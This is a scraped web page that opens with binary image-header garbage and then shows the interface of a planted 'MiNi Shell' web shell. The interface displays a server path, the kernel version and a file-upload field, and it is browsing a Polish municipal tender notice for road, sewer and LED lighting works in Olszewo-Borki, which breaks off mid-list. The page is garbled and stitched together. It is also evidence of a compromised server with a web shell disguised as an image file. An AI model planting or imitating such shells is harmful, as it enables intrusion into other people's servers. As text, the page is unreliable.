JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150311/53270-N-2015.html

<p class="kh_header"><b>Olszewo-Borki: Przebudowa dróg gminnych pomiędzy drogą krajową nr 61 i drogą powiatowa nr 2547W w miejscowości Grabowo i Olszewo-Borki wraz z budową infrastruktury wodno-kanalizacyjnej, w msc. Grabowo i Olszewo-Borki</b><br>
<b>Numer ogłoszenia: 53270 - 2015; data zamieszczenia: 11.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Olszewo-Borki , ul. Władysława Broniewskiego 13, 07-415 Olszewo-Borki, woj. mazowieckie, tel. 029 761-31-07, faks 029 7613223.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.olszewo-borki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg gminnych pomiędzy drogą krajową nr 61 i drogą powiatowa nr 2547W w miejscowości Grabowo i Olszewo-Borki wraz z budową infrastruktury wodno-kanalizacyjnej, w msc. Grabowo i Olszewo-Borki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie składa się z dwóch części - oddzielnych robót budowlanych do wykonania. 
Zamawiający dopuszcza składanie ofert łącznie na wszystkie części zamówienia oraz oddzielnie na każdą część zamówienia.
1. Przedmiotem części pierwszej zamówienia są roboty budowlane w miejscowości Olszewo-Borki i Grabowo w ulicach: Dojazdowa, 3-go Maja, Czwartaków, Kosynierów, Traugutta, Narutowicza, Lelewela, Długosza, polegające na przebudowie i budowa ulic o łącznej długości 3 226,10mb, budowie ścieżek rowerowych o łącznej długości 1 565,60mb, przebudowie i budowie chodników o łącznej długości 2 617,70mb, budowie zatoki autobusowej, i postojowej, budowie miejsc parkingowych, budowie 222 szt. zjazdów (w tym 11 szt. zjazdów publicznych i 211 szt. zjazdów na posesje prywatne); budowie sieci kanalizacji sanitarnej O160 i O200 wraz z 61 szt. przykanalików o łącznej dł. ok. 1300mb; rurociągu z rur PE O90, dł. 290mb; budowie sieci wodociągowej O90 z przyłączami w pasie drogowym O40 o łącznej dł. 1032,5mb, oznakowaniu poziomym i pionowym ulic, wycince 14 szt. drzew w szczególności: 
1) ul. Dojazdowa o długości 582mb obejmuje roboty budowlane polegające na wykonaniu:
a) jezdni z nakładki z warstwy ścieralnej betonu asfaltowego na istniejący asfalt,
b) chodnika z kostki betonowej brukowej,
c) ścieżki rowerowej z betonu asfaltowego,
d) zatoki autobusowej z kostki kamiennej granitowej,
e) zjazdów bramowych z kostki betonowej brukowej i betonu asfaltowego,
f) sieci kanalizacji sanitarnej z przyłączami,
g) sieci wodociągowej z przyłączami,
h) regulacji pionowej istniejących studni kanalizacji sanitarnej, telefonicznych i zaworów wodociągowych,
i) oznakowania pionowego i poziomego w tym elementów odblaskowych;
2) ul. 3-go Maja o długości 234,00mb (odcinek od ul. Dojazdowej do ul. Lelewela) obejmuje roboty budowlane polegające na wykonaniu:
a) chodnika z kostki betonowej brukowej, 
b) utwardzenia gruntu z kostki betonowej brukowej,
c) utwardzenia gruntu wzdłuż ulicy płytami  eko-ażur,
d) zjazdów bramowych z kostki betonowej brukowej,
e) sieci wodociągowej z przyłączami,
f) regulacji pionowej istniejących studni kanalizacji sanitarnej, telefonicznych i zaworów wodociągowych,
g) oznakowanie pionowego i poziomego.
3) ul. 3-go Maja o długości ok.713mb (odcinek od ul. Dojazdowej do ul. ks. J. Popiełuszki) obejmuje roboty budowlane polegające na wykonaniu:
a) wycinki drzew,
b) jezdni z betonu asfaltowego,
c) ścieżki rowerowej z betonu asfaltowego,
d) parkingów z kostki betonowej brukowej,
e) zjazdów bramowych z kostki betonowej brukowej i betonu asfaltowego,
f) przepustu rurowego pod pasem drogowym, barierki typ olsztyński;
g) oczyszczenia, przegłębienia i umocnienia rowu płytami eko-ażur;
h) umocnienia poboczy płytami eko-ażur;
i) sieci kanalizacji sanitarnej, grawitacyjnej z przyłączami oraz rurociągu z rur PE O90; 
j) sieci wodociągowej z przyłączami,
k) regulacji pionowej istniejących studni kanalizacji sanitarnej, telefonicznych i zaworów wodociągowych,
l) oznakowania pionowego i poziomego w tym elementów odblaskowych.
4) ul. Czwartaków o długości ok. 248mb obejmuje roboty budowlane polegające na wykonaniu:
a) jezdni z kostki betonowej brukowej,
b) chodnika z kostki betonowej brukowej,
c) zjazdów bramowych z kostki betonowej brukowej,
d) odwodnienia jezdni z płyt eko-ażur,
e) sieci kanalizacji sanitarnej z przyłączami,
f) sieci wodociągowej z przyłączami,
g) regulacji pionowej istniejących studni kanalizacji sanitarnej, telefonicznej i zaworów wodociągowych,
5) ul. Kosynierów o długości 250mb obejmuje roboty budowlane polegające na wykonaniu:
a) jezdni z kostki betonowej brukowej,
b) chodnika z kostki betonowej brukowej,
c) zjazdów bramowych z kostki betonowej brukowej,
d) odwodnienia jezdni z płyt eko-ażur,
e) sieci kanalizacji sanitarnej z przyłączami,
f) sieci wodociągowej z przyłączami,
g) regulacji pionowej istniejących studni kanalizacji sanitarnej, telefonicznej i zaworów wodociągowych ;
6) ul. Traugutta o długości 225mb obejmuje roboty budowlane polegające na wykonaniu:
a) jezdni z kostki betonowej brukowej,
b) chodnika z kostki betonowej brukowej,
c) zjazdów betonowych z kostki betonowej brukowej,
d) odwodnienia jezdni z płyt eko-ażur,
e) regulacji pionowej istniejących studni kanalizacji sanitarnej, telefonicznej i zaworów wodociągowych.
7) ul. Narutowicza o długości 168,55mb obejmuje roboty budowlane polegające na wykonaniu:
a) wycinki drzew,
b) jezdni z betonu asfaltowego,
c) chodnika z kostki betonowej brukowej,
d) zjazdów bramowych z kostki betonowej brukowej,
e) odwodnienia jezdni z płyt eko-ażur,
f) sieci kanalizacji sanitarnej z przyłączami,
g) sieci wodociągowej z przyłączami,
h) regulacji pionowej istniejących studni kanalizacji sanitarnej, telefonicznej i zaworów wodociągowych;
8) ul. Lelewela o długości 451mb obejmuje roboty budowlane polegające na wykonaniu:
a) jezdni z nakładki z warstwy ścieralnej betonu asfaltowego na istniejący asfalt,
b) chodnika z kostki betonowej brukowej,
c) zjazdów bramowych z kostki betonowej brukowej,
d) odwodnienia jezdni z płyt eko-ażur,
e) sieci kanalizacji sanitarnej z przyłączami,
f) sieci wodociągowej z przyłączami, 
g) regulacji pionowej istniejących studni kanalizacji sanitarnej, telefonicznej i zaworów wodociągowych;
h) oznakowania pionowego i poziomego.
9) ul. Długosza o długości 358,00mb obejmuje roboty budowlane polegające na wykonaniu:
a) wycinki drzew,
b) jezdni z warstwy ścieralnej z betonu asfaltowego, kostki betonowej brukowej,
c) chodnika z kostki betonowej brukowej,
d) ścieżki rowerowej z betonu asfaltowego,
e) zjazdów bramowych z kostki betonowej brukowej,
f) sieci kanalizacji sanitarnej z przyłączami, 
g) sieci wodociągowej z przyłączami,
h) regulację pionową istniejących studni kanalizacji sanitarnej, telefonicznej ido zaworów wodociągowych,
i) oznakowania pionowego i poziomego;
2. Przedmiotem części drugiej zamówienia jest wymiana lamp oświetleniowych na energooszczędne w miejscowościach Olszewo-Borki i Grabowo.
1) ul. Dojazdowa, na 12 istniejących słupach zamontować oprawy oświetleniowe kompletne typu LED o mocy 72W na wysięgniku  o masie do 15kg,
2) ul. 3-go Maja, na 28 istniejących słupach zamontować oprawy oświetleniowe kompletne typu LED o mocy 72W na wysięgniku  o masie do 15kg,
3) ul. Czwartaków, na 6 istniejących słupach zamontować oprawy oświetleniowe kompletne typu LED o mocy 54W na wysięgniku  o masie do 15kg,
4) ul. Kosynierów, na 7 istniejących słupach zamontować oprawy oświetleniowe kompletne typu LED o mocy 54W na wysięgniku o masie do 15kg, na 1 słupie zamontować szafkę elektryczną sterowniczą,
5) ul. Traugutta, na 6 istniejących słupach zamontować oprawy oświetleniowe kompletne typu LED o mocy 54W na wysięgniku o masie do 15kg,
6) ul. Narutowicza, na 4 istniejących słupach zamontować oprawy oświetleniowe kompletne typu LED o mocy 72W  na wysięgniku  o masie do 15kg,
7) ul. Lelewela, na 7 istniejących słupach zamontować oprawy oświetleniowe kompletne typu LED o mocy 72W na wysięgniku  o masie do 15kg,
8) ul. Długosza, na 5 istniejących słupach zamontować oprawy oświetleniowe kompletne typu LED o mocy 72W na wysięgniku o masie do 15kg,
9) ul. ks. J. Popiełuszki, na 16 istniejących słupach zamontować oprawy oświetleniowe kompletne typu LED o mocy 72W na wysięgniku o masie do 15kg, na słupie zamontować szafkę elektryczną sterowniczą.
10) oprawa oświetleniowa musi posiadać znak CE - certyfikat potwierdzający wykonanie jej zgodnie z normami europejskimi nadany przez niezależne laboratorium badawcze, posiadające akredytację na terenie Unii Europejskiej, np. certyfikat ENEC; przy ustawieniu 0° w stosunku do podłoża, nie może emitować światła w górną półprzestrzeń zgodnie z Rozporządzeniem Komisji Europejskiej nr 245/2009 z dnia 18 marca 2009 (DZ Urzędowy UE z dnia 24.03.2009r.); musi spełniać wymogi bezpieczeństwa fotobiologicznego lamp i systemów lampowych IEC 62471; skuteczność świetlna oprawy, rozumiana, jako strumień świetlny emitowany przez oprawę z uwzględnieniem wszelkich występujących strat do całkowitej energii zużywanej przez oprawę, jako system, nie może być gorsza niż 90 lumenów/Watt; musi spełniać wymogi I lub II klasy ochronności, stopień szczelności oprawy nie może być mniejszy niż IP 66, zakres temperatur pracy od -30° do +35°;
11) korpus oprawy ma być wykonany z odlewu aluminium stanowiącym jednocześnie radiator oprawy. Korpus nie może posiadać zewnętrznego radiatora w postaci użebrowania, ma być dostępny w dwóch rozmiarach dopasowanych do strumienia świetlnego oprawy, ma być pomalowany proszkowo w kolorze RAL 7035. Źródło światła - panel LED ma być osłonięty płaską szybą ze szkła hartowanego o IK nie gorszym niż IK 08;
12) uchwyt montażowy oprawy musi umożliwiać montaż oprawy zarówno na wysięgniku jak i na słupie o średnicy 48-60 mm oraz regulację położenia oprawy w zakresie -10° do +90° z krokiem nie mniejszym niż 5°;
13) oprawa ma być wyposażona w panel LED o następujących parametrach:
a) temperatura barwowa- naturalna biel 4000K+/- 5%,
b) co najmniej 60 000 h pracy do L80 przy Ta = 25°C (po upływie 60000 godzin świecenia strumień
świetlny nie mniejszy niż 80% strumienia nominalnego oprawy),
c) każda dioda w panelu led musi być wyposażona w indywidualną soczewkę pozwalającą emitować światło równomiernie na całą oświetlaną przez oprawę powierzchnię; w przypadku przepalenia się którejś z diod zmieni się jedynie strumień świetlny a nie rozsył światła,
d) deklarowany strumień świetlny oprawy ma być mierzony w temperaturze otoczenia oprawy nie mniejszej niż 25°C,
e) panel LED musi umożliwiać jego wymianę bez wykonywania połączeń lutowanych.
14) oprawa ma być wyposażona w układ zasilający o następujących cechach:
a) ma osiadać trwałość nie gorszą niż zasilany z niego panel LED,
b) ma zabezpieczać źródło światła przed przepięciami o napięciu co najmniej 10kV,
c) ma mieć możliwość zaprogramowania 5-stopniowej autonomicznej redukcji mocy,
d) ma być wyposażony w zewnętrzny interfejs służący do połączenia oprawy z zewnętrznym komputerem w celu zmian parametrów oświetlenia oraz czynności serwisowych,
e) ma być wyposażony w funkcję utrzymania stałego strumienia świetlnego w czasie..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających nie stanowiących więcej niż 50% wartości zamówienia podstawowego, zgodnie z art. 36 ust. 2 pkt 3, art. 67 ust. 1 pkt 6 ustawy Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.31.40-2, 45.23.31.61-5, 45.23.31.62-2, 45.23.32.22-1, 45.23.31.20-6, 45.23.13.00-8, 45.23.32.90-8, 45.31.31.10-9, 45.32.11.20-2, 45.31.23.11-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zasady wnoszenia wadium.
1)Wykonawca przystępujący do postępowania zobowiązany jest przed upływem terminu składania ofert wnieść wadium w wysokości:
a)część pierwszą zamówienia,  100 000,00zł (sto tysięcy złotych),
b)część drugą zamówienia,  4 000,00zł (cztery tysiące złotych);
2)Wykonawca, który nie wniesie wadium w wymaganym terminie oraz w wymaganej wysokości i formie, zostanie wykluczony z postępowania na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp.
2.Formy wnoszenia wadium 
1)pieniądzu,
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie z kasy jest zawsze poręczeniem pieniężnym;
3)gwarancjach bankowych;
4)gwarancjach ubezpieczeniowych;
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (D. U. z 2007 r. Nr 42, poz. 275, ze zm.);
6)wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego: 
Bank Spółdzielczy w Ostrołęce nr rachunku: 44 8922 0009 0000 0361 2000 0030 ;
7)wadium musi obejmować okres związania ofertą;
8)wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym;
9)w przypadku wniesienia wadium w pozostałych dopuszczalnych formach określonych w pkt. 2, wadium należy złożyć w oryginale, jako luźna, niezszyta część oferty; do oferty należy dołączyć kserokopię dokumentu poświadczonego przez Wykonawcę;
10)z treści złożonego poręczenia lub złożonej gwarancji winno wynikać bezwarunkowo, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Pzp - na każde żądanie Zamawiającego w terminie związania ofertą,:
a)określenie podmiotu, który wystawia gwarancję/poręczenie (pełna nazwa, dokładny adres);
b)określenie beneficjanta gwarancji/poręczenia: Gmina Olszewo-Borki, ul. Broniewskiego 13, 07-415 Olszewo-Borki.
3.Zwrot wadium
Zamawiający zwraca wadium w terminie i zgodnie z art. 46 Pzp. 
4.Zatrzymanie wadium 
Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art.. 46 ust. 4a i ust. 5 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełnienia tego warunku udziału w postępowaniu. Zamawiający będzie polegał na złożonych przez Wykonawcę oświadczeniach o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże że wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej 2 roboty budowlane, polegające na:
1)dla części pierwszej zamówienia budowie lub przebudowie dróg, chodników, ścieżek rowerowych, parkingów wraz z infrastrukturą towarzyszącą tj. siecią kanalizacji deszczowej, sanitarnej lub wodociągowej o wartości minimum dla każdej z robót 4 000 000 zł brutto (słownie: cztery miliony złotych) 
2)dla części drugiej zamówienia budowie lub przebudowie linii oświetlenia drogowego o wartości minimum dla każdej z robót: 100 000 zł brutto (słownie: sto tysięcy złotych).
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełnienia tego warunku udziału w postępowaniu. Zamawiający będzie polegał na złożonych przez Wykonawcę oświadczeniu o spełnieniu warunków udziału w postępowaniu.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże że będzie dysponował co najmniej jedną osobą zdolną do wykonania zamówienia posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w zakresie branży drogowej, sanitarnej i elektrycznej, z min. 3-letnim doświadczeniem na stanowisku kierownika budowy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełnienia tego warunku udziału w postępowaniu. Zamawiający będzie polegał na złożonych przez Wykonawcę oświadczeniu o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
